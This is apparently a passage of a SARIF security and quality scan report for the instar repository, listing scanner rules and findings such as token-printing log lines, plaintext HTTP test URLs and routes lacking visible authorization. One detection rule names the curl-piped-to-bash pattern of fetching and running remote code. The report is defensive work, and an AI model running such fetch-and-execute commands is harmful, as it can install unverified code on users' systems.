{"version": "2.1.0", "$schema": "https://json.schemastore.org/sarif-2.1.0.json", "runs": [{"tool": {"driver": {"name": "Repobility", "informationUri": "https://repobility.com", "rules": [{"id": "QUAL003", "name": "Magic number used as default arg", "shortDescription": {"text": "Magic number used as default arg"}, "fullDescription": {"text": "Using hardcoded default values for complex configuration objects makes the code brittle and difficult to manage. Consider using a dedicated factory or builder pattern.\n\nAuto-promoted from proposal 444 on 2026-05-12. Synth confidence: 0.85. FP estimate: 0.00."}, "properties": {"scanner": "repobility", "category": "quality", "severity": "medium", "confidence": 0.85, "cwe": "", "owasp": ""}}, {"id": "LOG001", "name": "PII printed to stdout/stderr", "shortDescription": {"text": "PII printed to stdout/stderr"}, "fullDescription": {"text": "Logging a password, token, email address, or SSN directly to stdout or stderr."}, "properties": {"scanner": "repobility", "category": "logging", "severity": "medium", "confidence": 0.85, "cwe": "", "owasp": ""}}, {"id": "CORS001", "name": "CORS misconfiguration \u2014 wildcard Access-Control-Allow-Origin", "shortDescription": {"text": "CORS misconfiguration \u2014 wildcard Access-Control-Allow-Origin"}, "fullDescription": {"text": "Access-Control-Allow-Origin: * exposes the API to any browser origin. 
Acceptable for public read-only endpoints; dangerous when paired with credentials or write endpoints."}, "properties": {"scanner": "repobility", "category": "auth", "severity": "medium", "confidence": 0.85, "cwe": "", "owasp": ""}}, {"id": "CRYP001", "name": "Crypto \u2014 plaintext HTTP for sensitive endpoint", "shortDescription": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "fullDescription": {"text": "Hardcoded http:// (not localhost) for endpoints that handle credentials or data."}, "properties": {"scanner": "repobility", "category": "crypto", "severity": "medium", "confidence": 0.45, "cwe": "", "owasp": ""}}, {"id": "WEB003", "name": "Public web service has no security.txt", "shortDescription": {"text": "Public web service has no security.txt"}, "fullDescription": {"text": "security.txt gives researchers and customers a safe disclosure channel. Public web apps and APIs should publish it under /.well-known/security.txt."}, "properties": {"scanner": "repobility-web-presence", "category": "quality", "severity": "medium", "confidence": 0.78, "cwe": "", "owasp": ""}}, {"id": "JRN003", "name": "Frontend API reference is not matched by discovered backend routes", "shortDescription": {"text": "Frontend API reference is not matched by discovered backend routes"}, "fullDescription": {"text": "A frontend string references a same-origin API path that Repobility could not match to backend route inventory. This often causes live 404s in user journeys."}, "properties": {"scanner": "repobility-journey-contract", "category": "quality", "severity": "medium", "confidence": 0.74, "cwe": "", "owasp": ""}}, {"id": "JRN002", "name": "Browser storage is used for session token material", "shortDescription": {"text": "Browser storage is used for session token material"}, "fullDescription": {"text": "localStorage and sessionStorage are readable by injected JavaScript. 
For sensitive sessions, this turns XSS into account compromise."}, "properties": {"scanner": "repobility-journey-contract", "category": "auth", "severity": "medium", "confidence": 0.82, "cwe": "", "owasp": ""}}, {"id": "AUC009", "name": "[AUC009] Sensitive function route lacks elevated authorization evidence: A route appears to perform a sensitive function", "shortDescription": {"text": "[AUC009] Sensitive function route lacks elevated authorization evidence: A route appears to perform a sensitive function such as export, invite, role, token, billing, or destructive action without elevated policy evidence. Endpoint: DELETE "}, "fullDescription": {"text": "A route appears to perform a sensitive function such as export, invite, role, token, billing, or destructive action without elevated policy evidence. Endpoint: DELETE /semantic/forget/:id."}, "properties": {"scanner": "repobility-access-control", "category": "auth", "severity": "medium", "confidence": 0.68, "cwe": "CWE-285", "owasp": "API5:2023 Broken Function Level Authorization"}}, {"id": "AUC004", "name": "[AUC004] Admin route does not show super_admin separation: An administrative route was detected without nearby evidence ", "shortDescription": {"text": "[AUC004] Admin route does not show super_admin separation: An administrative route was detected without nearby evidence that platform super_admin access is separated from tenant/application admin access. Endpoint: GET /git/log."}, "fullDescription": {"text": "An administrative route was detected without nearby evidence that platform super_admin access is separated from tenant/application admin access. 
Endpoint: GET /git/log."}, "properties": {"scanner": "repobility-access-control", "category": "auth", "severity": "medium", "confidence": 0.66, "cwe": "CWE-285", "owasp": "API5:2023 Broken Function Level Authorization"}}, {"id": "AUC002", "name": "[AUC002] Low visible authorization coverage in route inventory: Only 22.5% of discovered routes show nearby authenticati", "shortDescription": {"text": "[AUC002] Low visible authorization coverage in route inventory: Only 22.5% of discovered routes show nearby authentication, authorization, middleware, or public-route evidence."}, "fullDescription": {"text": "Only 22.5% of discovered routes show nearby authentication, authorization, middleware, or public-route evidence."}, "properties": {"scanner": "repobility-access-control", "category": "auth", "severity": "medium", "confidence": 0.74, "cwe": "CWE-285", "owasp": "WSTG-AUTHZ"}}, {"id": "AUC001", "name": "[AUC001] No Repobility access matrix policy found: The repository uses web/API frameworks but does not define .repobilit", "shortDescription": {"text": "[AUC001] No Repobility access matrix policy found: The repository uses web/API frameworks but does not define .repobility/access.yml or equivalent authorization documentation."}, "fullDescription": {"text": "The repository uses web/API frameworks but does not define .repobility/access.yml or equivalent authorization documentation."}, "properties": {"scanner": "repobility-access-control", "category": "auth", "severity": "medium", "confidence": 0.92, "cwe": "CWE-285", "owasp": "WSTG-AUTHZ"}}, {"id": "DKR001", "name": "Docker final stage has no non-root USER", "shortDescription": {"text": "Docker final stage has no non-root USER"}, "fullDescription": {"text": "Docker images run as root unless the image or Dockerfile switches to a non-root user."}, "properties": {"scanner": "repobility-docker", "category": "docker", "severity": "medium", "confidence": 0.82, "cwe": "", "owasp": ""}}, {"id": "ERR002", "name": "[ERR002] Empty 
Catch Block: Empty catch blocks hide errors.", "shortDescription": {"text": "[ERR002] Empty Catch Block: Empty catch blocks hide errors."}, "fullDescription": {"text": "Log the error or rethrow it. Use console.error() at minimum."}, "properties": {"scanner": "repobility-threat-engine", "category": "error_handling", "severity": "medium", "confidence": 1.0, "cwe": "", "owasp": ""}}, {"id": "SEC007", "name": "[SEC007] Unsafe Deserialization: Unsafe deserialization can execute arbitrary code.", "shortDescription": {"text": "[SEC007] Unsafe Deserialization: Unsafe deserialization can execute arbitrary code."}, "fullDescription": {"text": "Use yaml.safe_load() instead of yaml.load(). Avoid pickle for untrusted data."}, "properties": {"scanner": "repobility-threat-engine", "category": "deserialization", "severity": "medium", "confidence": 1.0, "cwe": "", "owasp": ""}}, {"id": "ERR001", "name": "[ERR001] Silent Exception Swallowing: Silently swallowing all exceptions hides bugs. Even in cleanup code, log at DEBUG ", "shortDescription": {"text": "[ERR001] Silent Exception Swallowing: Silently swallowing all exceptions hides bugs. Even in cleanup code, log at DEBUG level."}, "fullDescription": {"text": "Log the error: `except Exception: logger.debug('cleanup failed', exc_info=True)`. Or handle specific exception types."}, "properties": {"scanner": "repobility-threat-engine", "category": "error_handling", "severity": "medium", "confidence": 1.0, "cwe": "", "owasp": ""}}, {"id": "AGT012", "name": "Agent control bridge may listen on a network interface without visible auth", "shortDescription": {"text": "Agent control bridge may listen on a network interface without visible auth"}, "fullDescription": {"text": "Agent, MCP, sidecar, and command bridge servers often start as local helpers. 
Binding them to 0.0.0.0 or a default all-interface listener without an authorization guard can expose tool execution or session data to the LAN."}, "properties": {"scanner": "repobility-agent-runtime", "category": "quality", "severity": "medium", "confidence": 0.72, "cwe": "", "owasp": ""}}, {"id": "AGT013", "name": "Agent auto-approve or skip-permissions mode is easy to enable", "shortDescription": {"text": "Agent auto-approve or skip-permissions mode is easy to enable"}, "fullDescription": {"text": "Codex/agent auto-approve, YOLO, or skip-permissions modes can be useful in isolated automation, but they remove the human checkpoint before command execution, network access, and file edits."}, "properties": {"scanner": "repobility-agent-runtime", "category": "quality", "severity": "medium", "confidence": 0.68, "cwe": "", "owasp": ""}}, {"id": "AIC003", "name": "Duplicated implementation block across source files", "shortDescription": {"text": "Duplicated implementation block across source files"}, "fullDescription": {"text": "Duplicated blocks are a common artifact when generated code is pasted or recreated instead of reused. 
They increase maintenance cost because every future bug fix must be found in multiple locations."}, "properties": {"scanner": "repobility-ai-code-hygiene", "category": "quality", "severity": "medium", "confidence": 0.86, "cwe": "", "owasp": ""}}, {"id": "QUAL004", "name": "Placeholder default username (admin/admin)", "shortDescription": {"text": "Placeholder default username (admin/admin)"}, "fullDescription": {"text": "foo@bar.com / john.doe@example.com / admin/admin / changeme \u2014 typical AI placeholder credentials."}, "properties": {"scanner": "repobility", "category": "quality", "severity": "low", "confidence": 0.85, "cwe": "", "owasp": ""}}, {"id": "WEB005", "name": "robots.txt does not advertise a sitemap", "shortDescription": {"text": "robots.txt does not advertise a sitemap"}, "fullDescription": {"text": "Sitemap directives in robots.txt help crawlers and AI agents find the canonical public URL inventory quickly."}, "properties": {"scanner": "repobility-web-presence", "category": "quality", "severity": "low", "confidence": 0.74, "cwe": "", "owasp": ""}}, {"id": "DKR008", "name": ".dockerignore misses sensitive defaults", "shortDescription": {"text": ".dockerignore misses sensitive defaults"}, "fullDescription": {"text": ".dockerignore exists but does not cover common secret or VCS patterns."}, "properties": {"scanner": "repobility-docker", "category": "docker", "severity": "low", "confidence": 0.72, "cwe": "", "owasp": ""}}, {"id": "SEC006", "name": "[SEC006] XSS Risk: Direct HTML injection without sanitization.", "shortDescription": {"text": "[SEC006] XSS Risk: Direct HTML injection without sanitization."}, "fullDescription": {"text": "Use textContent instead of innerHTML. 
Sanitize with DOMPurify."}, "properties": {"scanner": "repobility-threat-engine", "category": "injection", "severity": "low", "confidence": 0.4, "cwe": "", "owasp": ""}}, {"id": "ERR003", "name": "[ERR003] Ignored Error (Go): Ignoring error return values.", "shortDescription": {"text": "[ERR003] Ignored Error (Go): Ignoring error return values."}, "fullDescription": {"text": "Handle the error or use errcheck linter."}, "properties": {"scanner": "repobility-threat-engine", "category": "error_handling", "severity": "low", "confidence": 1.0, "cwe": "", "owasp": ""}}, {"id": "SEC015", "name": "[SEC015] Insecure Randomness for Security (and 29 more): Same pattern found in 29 additional files. Review if needed.", "shortDescription": {"text": "[SEC015] Insecure Randomness for Security (and 29 more): Same pattern found in 29 additional files. Review if needed."}, "fullDescription": {"text": "Use secrets module (Python) or crypto.getRandomValues() (JS) for security-sensitive randomness."}, "properties": {"scanner": "repobility-threat-engine", "category": "crypto", "severity": "info", "confidence": 0.2, "cwe": "", "owasp": ""}}, {"id": "SEC020", "name": "[SEC020] Secret Printed to Logs (and 30 more): Same pattern found in 30 additional files. Review if needed.", "shortDescription": {"text": "[SEC020] Secret Printed to Logs (and 30 more): Same pattern found in 30 additional files. Review if needed."}, "fullDescription": {"text": "Log only redacted, hashed, or last-four-style metadata. Rotate any secret that may have reached logs."}, "properties": {"scanner": "repobility-threat-engine", "category": "credential_exposure", "severity": "info", "confidence": 0.2, "cwe": "", "owasp": ""}}, {"id": "SUPC001", "name": "Supply chain \u2014 curl | bash anti-pattern", "shortDescription": {"text": "Supply chain \u2014 curl | bash anti-pattern"}, "fullDescription": {"text": "curl ... 
| sh / bash \u2014 executes code fetched from the network without verifying it."}, "properties": {"scanner": "repobility", "category": "supply_chain", "severity": "high", "confidence": 0.85, "cwe": "", "owasp": ""}}, {"id": "AUC003", "name": "[AUC003] Object-level route lacks visible authorization: A route with an object id-like parameter does not show nearby a", "shortDescription": {"text": "[AUC003] Object-level route lacks visible authorization: A route with an object id-like parameter does not show nearby authentication or authorization evidence. This is a BOLA/IDOR review target. Endpoint: POST /jobs/:slug/trigger."}, "fullDescription": {"text": "A route with an object id-like parameter does not show nearby authentication or authorization evidence. This is a BOLA/IDOR review target. Endpoint: POST /jobs/:slug/trigger."}, "properties": {"scanner": "repobility-access-control", "category": "auth", "severity": "high", "confidence": 0.7, "cwe": "CWE-639", "owasp": "API1:2023 Broken Object Level Authorization"}}, {"id": "SECR004", "name": "Password embedded in URL", "shortDescription": {"text": "Password embedded in URL"}, "fullDescription": {"text": "https://user:password@host \u2014 leaks credentials via logs, Referer headers, and error messages."}, "properties": {"scanner": "repobility", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "cwe": "", "owasp": ""}}, {"id": "SECR001", "name": "Hardcoded secret in source", "shortDescription": {"text": "Hardcoded secret in source"}, "fullDescription": {"text": "API key, AWS access key, password, or private key embedded directly in source. 
AI assistants frequently leak demo creds."}, "properties": {"scanner": "repobility", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "cwe": "", "owasp": ""}}]}}, "automationDetails": {"id": "repobility/331"}, "properties": {"repository": "JKHeadley/instar", "repoUrl": "https://github.com/JKHeadley/instar", "branch": "main"}, "results": [{"ruleId": "QUAL003", "level": "warning", "message": {"text": "Magic number used as default arg"}, "properties": {"repobilityId": 21966, "scanner": "repobility", "fingerprint": "7217043fcfa87b7a4d79ba9782a4ba01", "category": "quality", "severity": "medium", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "default 1", "aljefra_cwe": null, "aljefra_owasp": null, "aljefra_pattern_slug": "magic-number-default"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/e2e/file-viewer-e2e.test.ts"}, "region": {"startLine": 108}}}]}, {"ruleId": "QUAL003", "level": "warning", "message": {"text": "Magic number used as default arg"}, "properties": {"repobilityId": 21965, "scanner": "repobility", "fingerprint": "769c6d4478bac32f67eba6b11bb282bc", "category": "quality", "severity": "medium", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "default 20", "aljefra_cwe": null, "aljefra_owasp": null, "aljefra_pattern_slug": "magic-number-default"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/e2e/scope-coherence-lifecycle.test.ts"}, "region": {"startLine": 169}}}]}, {"ruleId": "QUAL003", "level": "warning", "message": {"text": "Magic number used as default arg"}, "properties": {"repobilityId": 21964, "scanner": "repobility", "fingerprint": "39b491662bff548dfa5aa3ae175b8631", "category": "quality", "severity": "medium", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": 
"default 60", "aljefra_cwe": null, "aljefra_owasp": null, "aljefra_pattern_slug": "magic-number-default"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/activity-partitioner.test.ts"}, "region": {"startLine": 305}}}]}, {"ruleId": "QUAL003", "level": "warning", "message": {"text": "Magic number used as default arg"}, "properties": {"repobilityId": 21963, "scanner": "repobility", "fingerprint": "22a144a837d8ba2bbfd8d17a3afd700b", "category": "quality", "severity": "medium", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "default 64", "aljefra_cwe": null, "aljefra_owasp": null, "aljefra_pattern_slug": "magic-number-default"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/InboundMessageGate.test.ts"}, "region": {"startLine": 66}}}]}, {"ruleId": "QUAL003", "level": "warning", "message": {"text": "Magic number used as default arg"}, "properties": {"repobilityId": 21962, "scanner": "repobility", "fingerprint": "7577b01cea4263b803223cffa473cbde", "category": "quality", "severity": "medium", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "default 30", "aljefra_cwe": null, "aljefra_owasp": null, "aljefra_pattern_slug": "magic-number-default"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/nonce-store-config.test.ts"}, "region": {"startLine": 49}}}]}, {"ruleId": "QUAL003", "level": "warning", "message": {"text": "Magic number used as default arg"}, "properties": {"repobilityId": 21961, "scanner": "repobility", "fingerprint": "10f1644d7f9977c4739a7be44176d0b3", "category": "quality", "severity": "medium", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "default 30", "aljefra_cwe": null, "aljefra_owasp": null, "aljefra_pattern_slug": "magic-number-default"}}, "locations": 
[{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/nonce-store-config.test.ts"}, "region": {"startLine": 42}}}]}, {"ruleId": "QUAL003", "level": "warning", "message": {"text": "Magic number used as default arg"}, "properties": {"repobilityId": 21960, "scanner": "repobility", "fingerprint": "7016f24752aebdd0b3955ace509704c2", "category": "quality", "severity": "medium", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "default 10", "aljefra_cwe": null, "aljefra_owasp": null, "aljefra_pattern_slug": "magic-number-default"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/branch-manager.test.ts"}, "region": {"startLine": 91}}}]}, {"ruleId": "QUAL003", "level": "warning", "message": {"text": "Magic number used as default arg"}, "properties": {"repobilityId": 21959, "scanner": "repobility", "fingerprint": "49baa982ef6cc64764e47265b01332a0", "category": "quality", "severity": "medium", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "default 2", "aljefra_cwe": null, "aljefra_owasp": null, "aljefra_pattern_slug": "magic-number-default"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/branch-manager.test.ts"}, "region": {"startLine": 81}}}]}, {"ruleId": "QUAL003", "level": "warning", "message": {"text": "Magic number used as default arg"}, "properties": {"repobilityId": 21958, "scanner": "repobility", "fingerprint": "3dba5f994434521f4faa1d4858e4052f", "category": "quality", "severity": "medium", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "default 30", "aljefra_cwe": null, "aljefra_owasp": null, "aljefra_pattern_slug": "magic-number-default"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/middleware-behavioral.test.ts"}, "region": {"startLine": 208}}}]}, {"ruleId": 
"QUAL003", "level": "warning", "message": {"text": "Magic number used as default arg"}, "properties": {"repobilityId": 21957, "scanner": "repobility", "fingerprint": "170966e1b8d63400afbee7513cfa4db1", "category": "quality", "severity": "medium", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "default 3", "aljefra_cwe": null, "aljefra_owasp": null, "aljefra_pattern_slug": "magic-number-default"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/CommitmentTracker.test.ts"}, "region": {"startLine": 865}}}]}, {"ruleId": "QUAL003", "level": "warning", "message": {"text": "Magic number used as default arg"}, "properties": {"repobilityId": 21956, "scanner": "repobility", "fingerprint": "c726c81a7bcc08b2574ff004dc53438e", "category": "quality", "severity": "medium", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "default 30", "aljefra_cwe": null, "aljefra_owasp": null, "aljefra_pattern_slug": "magic-number-default"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/request-timeout.test.ts"}, "region": {"startLine": 43}}}]}, {"ruleId": "QUAL003", "level": "warning", "message": {"text": "Magic number used as default arg"}, "properties": {"repobilityId": 21955, "scanner": "repobility", "fingerprint": "c0a18e37eb792ad2f381adf4c5d98ac3", "category": "quality", "severity": "medium", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "default 5", "aljefra_cwe": null, "aljefra_owasp": null, "aljefra_pattern_slug": "magic-number-default"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/agent-bus-replay-protection.test.ts"}, "region": {"startLine": 707}}}]}, {"ruleId": "QUAL003", "level": "warning", "message": {"text": "Magic number used as default arg"}, "properties": {"repobilityId": 21954, 
"scanner": "repobility", "fingerprint": "066f4a601ec99534042c1b6341238b3b", "category": "quality", "severity": "medium", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "default 5", "aljefra_cwe": null, "aljefra_owasp": null, "aljefra_pattern_slug": "magic-number-default"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/agent-bus-replay-protection.test.ts"}, "region": {"startLine": 687}}}]}, {"ruleId": "QUAL003", "level": "warning", "message": {"text": "Magic number used as default arg"}, "properties": {"repobilityId": 21953, "scanner": "repobility", "fingerprint": "56c74dcd44090bc41813ab0a773df03d", "category": "quality", "severity": "medium", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "default 7", "aljefra_cwe": null, "aljefra_owasp": null, "aljefra_pattern_slug": "magic-number-default"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/intent-reflect.test.ts"}, "region": {"startLine": 150}}}]}, {"ruleId": "QUAL003", "level": "warning", "message": {"text": "Magic number used as default arg"}, "properties": {"repobilityId": 21952, "scanner": "repobility", "fingerprint": "db618092afdaac5e6a3e34cfe9b4b0f1", "category": "quality", "severity": "medium", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "default 10", "aljefra_cwe": null, "aljefra_owasp": null, "aljefra_pattern_slug": "magic-number-default"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/ForegroundRestartWatcher.test.ts"}, "region": {"startLine": 53}}}]}, {"ruleId": "QUAL003", "level": "warning", "message": {"text": "Magic number used as default arg"}, "properties": {"repobilityId": 21951, "scanner": "repobility", "fingerprint": "06055db3ba7b5f0a9f9d80e0dc529a32", "category": "quality", "severity": "medium", 
"confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "default 10", "aljefra_cwe": null, "aljefra_owasp": null, "aljefra_pattern_slug": "magic-number-default"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/integration/quota-collection.test.ts"}, "region": {"startLine": 278}}}]}, {"ruleId": "QUAL003", "level": "warning", "message": {"text": "Magic number used as default arg"}, "properties": {"repobilityId": 21950, "scanner": "repobility", "fingerprint": "e9a14e660da2c8602885b351657d87dd", "category": "quality", "severity": "medium", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "default 14", "aljefra_cwe": null, "aljefra_owasp": null, "aljefra_pattern_slug": "magic-number-default"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/integration/drift-routes.test.ts"}, "region": {"startLine": 99}}}]}, {"ruleId": "LOG001", "level": "warning", "message": {"text": "PII printed to stdout/stderr"}, "properties": {"repobilityId": 17014, "scanner": "repobility", "fingerprint": "3a1d8882b7019a1bdb9c6c9ab8fcf132", "category": "logging", "severity": "medium", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "console.log(`  Token file: ${opts.tokenFile || '.instar/gmail-token", "aljefra_cwe": ["CWE-532"], "aljefra_owasp": "A09:2021", "aljefra_pattern_slug": "print-pii"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/cli.ts"}, "region": {"startLine": 214}}}]}, {"ruleId": "LOG001", "level": "warning", "message": {"text": "PII printed to stdout/stderr"}, "properties": {"repobilityId": 17013, "scanner": "repobility", "fingerprint": "441e15ce2910f823f2211c3d226be28e", "category": "logging", "severity": "medium", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", 
"evidence": {"snippet": "console.log(`  Bot token: ${token", "aljefra_cwe": ["CWE-532"], "aljefra_owasp": "A09:2021", "aljefra_pattern_slug": "print-pii"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/cli.ts"}, "region": {"startLine": 97}}}]}, {"ruleId": "LOG001", "level": "warning", "message": {"text": "PII printed to stdout/stderr"}, "properties": {"repobilityId": 17012, "scanner": "repobility", "fingerprint": "9ba754664f6415fdc753fb9940c8121e", "category": "logging", "severity": "medium", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "console.log('Get a bot token", "aljefra_cwe": ["CWE-532"], "aljefra_owasp": "A09:2021", "aljefra_pattern_slug": "print-pii"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/cli.ts"}, "region": {"startLine": 57}}}]}, {"ruleId": "LOG001", "level": "warning", "message": {"text": "PII printed to stdout/stderr"}, "properties": {"repobilityId": 17011, "scanner": "repobility", "fingerprint": "2752f4a2bd79f44d27c3a51488abc8a7", "category": "logging", "severity": "medium", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "console.log(`  instar add telegram --token", "aljefra_cwe": ["CWE-532"], "aljefra_owasp": "A09:2021", "aljefra_pattern_slug": "print-pii"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/cli.ts"}, "region": {"startLine": 55}}}]}, {"ruleId": "LOG001", "level": "warning", "message": {"text": "PII printed to stdout/stderr"}, "properties": {"repobilityId": 17010, "scanner": "repobility", "fingerprint": "497a2b48b6e990ee19b53bf47ffb6b45", "category": "logging", "severity": "medium", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "console.log(pc.yellow('Both --token", "aljefra_cwe": ["CWE-532"], "aljefra_owasp": "A09:2021", "aljefra_pattern_slug": 
"print-pii"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/cli.ts"}, "region": {"startLine": 52}}}]}, {"ruleId": "CORS001", "level": "warning", "message": {"text": "CORS misconfiguration \u2014 wildcard Access-Control-Allow-Origin"}, "properties": {"repobilityId": 15805, "scanner": "repobility", "fingerprint": "1eae98da1815b95a14fc2f78eaf4443f", "category": "auth", "severity": "medium", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "corsMiddleware origin filtering', () => {", "aljefra_cwe": ["CWE-942", "CWE-346"], "aljefra_owasp": "A05:2021", "aljefra_pattern_slug": "cors-wildcard"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/middleware-behavioral.test.ts"}, "region": {"startLine": 16}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "properties": {"repobilityId": 14236, "scanner": "repobility", "fingerprint": "6ce2ebd73a51ec67166bb5bea9df5dbb", "category": "crypto", "severity": "medium", "confidence": 0.45, "triageState": "open", "verdict": "likely_fp", "isResolved": false, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "http://", "aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/e2e/threadline/A2AE2E.test.ts"}, "region": {"startLine": 852}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "properties": {"repobilityId": 14235, "scanner": "repobility", "fingerprint": "dd330e110a7c8533b5da8b0d6aa7324c", "category": "crypto", "severity": "medium", "confidence": 0.45, "triageState": "open", "verdict": "likely_fp", "isResolved": false, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "http://", 
"aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/e2e/launchd-node-boot-wrapper.test.ts"}, "region": {"startLine": 444}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "properties": {"repobilityId": 14234, "scanner": "repobility", "fingerprint": "16f1603f5ca0ae50d2478cee2759ed67", "category": "crypto", "severity": "medium", "confidence": 0.45, "triageState": "open", "verdict": "likely_fp", "isResolved": false, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "http://", "aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/e2e/phase4-dispatch-scope-provenance.test.ts"}, "region": {"startLine": 176}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "properties": {"repobilityId": 14233, "scanner": "repobility", "fingerprint": "d31f601d03747166efb524864cbe3102", "category": "crypto", "severity": "medium", "confidence": 0.45, "triageState": "open", "verdict": "likely_fp", "isResolved": false, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "http://", "aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/e2e/discernment-layer-e2e.test.ts"}, "region": {"startLine": 674}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "properties": {"repobilityId": 14232, "scanner": "repobility", "fingerprint": "d1dd9ef3dfa38c790077af970bced294", "category": "crypto", "severity": "medium", "confidence": 0.45, "triageState": "open", "verdict": 
"likely_fp", "isResolved": false, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "http://", "aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/e2e/messaging-lifecycle.test.ts"}, "region": {"startLine": 203}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "properties": {"repobilityId": 14231, "scanner": "repobility", "fingerprint": "2f3a47d00978715b94dc211df4804fde", "category": "crypto", "severity": "medium", "confidence": 0.45, "triageState": "open", "verdict": "likely_fp", "isResolved": false, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "http://", "aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/AdaptationValidator.test.ts"}, "region": {"startLine": 194}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "properties": {"repobilityId": 14230, "scanner": "repobility", "fingerprint": "547b6e426c7a3a11e470f004e303a78d", "category": "crypto", "severity": "medium", "confidence": 0.45, 